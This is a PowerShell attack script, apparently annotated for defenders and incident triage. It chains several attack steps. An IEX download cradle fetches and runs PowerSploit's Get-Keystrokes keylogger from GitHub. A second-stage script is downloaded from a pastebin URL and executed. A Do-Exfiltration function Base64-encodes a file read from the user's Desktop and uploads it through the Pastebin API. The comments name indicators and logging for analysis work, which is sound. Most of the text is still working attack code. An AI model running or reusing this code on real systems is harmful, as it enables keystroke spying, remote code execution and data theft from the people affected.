- # Download cradle: fetches Get-Keystrokes.ps1 from the PowerSploit GitHub repository and
- # evaluates the returned string with IEX, so the script text is never saved by this line.
- # For defenders: PowerShell script-block logging and AMSI see the evaluated text, and
- # proxy/DNS logs show the request to raw.githubusercontent.com.
- IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
- # Runs the function loaded above with -Timeout 10, logging to a .cst file in the user's
- # Temp directory. That log path is a file-system indicator worth searching for during triage.
- Get-Keystrokes -LogPath ~\AppData\Local\Temp\01JKNVB1.cst -Timeout 10
- # Second stage: saves the raw paste 91PJ6iJG from pastebin.com to disk as mess3.ps1.
- # The file name is relative, so where it lands depends on the working directory.
- $down = New-Object System.Net.WebClient
- $url = 'https://pastebin.com/raw/91PJ6iJG';
- $file = 'mess3.ps1';
- $down.DownloadFile($url,$file);
- # Evaluates mess3.ps1 with IEX by handing a hard-coded local path to DownloadString.
- # The path names a specific user profile (C:\Users\Chris), a host-specific artefact.
- IEX (New-Object Net.WebClient).DownloadString('C:\Users\Chris\Documents\powershell\mess3.ps1')
- # The next two lines are commented out by the author and do not run: a New-PasteBin call
- # and a powershell.exe launch of mess3.ps1 with -executionpolicy bypass.
- #New-PasteBin -pasteCode "Get-ChildItem C:\Users\Chris\Desktop\testing123.txt" -pasteName "attempt 1 WWWSAQnn" -pasteSubDomain "WWWSAQnn" -pasteExpireDate "N" -pasteFormat "powershell"
- #powershell.exe -executionpolicy bypass -file mess3.ps1
- # Pastebin API developer key and account credentials, interpolated into the login and
- # post requests inside Do-Exfiltration. All three are empty strings in this copy.
- # NOTE(review): in a recovered sample where these are populated, they identify the
- # Pastebin account in use and belong in the incident record and any abuse report.
- $dev_key=""
- $username=""
- $password=""
- # Do-Exfiltration: Base64-encodes the contents of $Data and uploads it as a paste through
- # the Pastebin API. Takes no parameters; $Data, $dev_key, $username and $password are
- # not defined here and are resolved from the calling scope.
- # For defenders: the observable behaviour is a PowerShell process creating the
- # Msxml2.XMLHTTP COM object and sending two POSTs to pastebin.com
- # (/api/api_login.php, then /api/api_post.php).
- function Do-Exfiltration
- {
- # Nested helper: sends $parameters as a form-encoded POST body to $url and keeps the
- # response body in the script-scoped variable $session_key. No return value.
- function post_http($url,$parameters)
- {
- $http_request = New-Object -ComObject Msxml2.XMLHTTP
- # Third argument $false = synchronous request; send() blocks until the response arrives.
- $http_request.open("POST", $url, $false)
- $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
- $http_request.setRequestHeader("Content-length", $parameters.length);
- $http_request.setRequestHeader("Connection", "close")
- $http_request.send($parameters)
- # Overwritten on every call, so it holds whatever the most recent request returned.
- $script:session_key=$http_request.responseText
- }
- # Everything between <# and #> is a block comment: Compress-Encode is never defined or called.
- <#
- function Compress-Encode
- {
- #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
- $ms = New-Object IO.MemoryStream
- $action = [IO.Compression.CompressionMode]::Compress
- $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
- $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
- $pastevalue | ForEach-Object {$sw.WriteLine($_)}
- $sw.Close()
- # Base64 encode stream
- $code = [Convert]::ToBase64String($ms.ToArray())
- return $code
- }
- #>
- # Payload preparation: UTF-8 bytes of $Data, then Base64. This is encoding only, not
- # encryption, so a recovered paste body can be decoded directly by an analyst.
- $utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
- $pastevalue = [System.Convert]::ToBase64String($utfbytes)
- # Fixed paste title; usable as a search indicator.
- $pastename = "WWWXVDI"
- # Login request: the response (stored in $session_key by post_http) is used as api_user_key below.
- post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
- # Upload request: creates the paste with api_paste_private=2
- # (presumably the API's "private" visibility - confirm against the Pastebin API docs).
- post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
- }
- # Driver: moves up five directory levels, reads a file from the current user's Desktop
- # into $data (cat is the PowerShell alias for Get-Content), then calls Do-Exfiltration.
- # PowerShell variable names are case-insensitive, so this $data is the $Data the function reads.
- cd ../../../../../
- $data=cat ~/Desktop/stealthis.txt
- Do-Exfiltration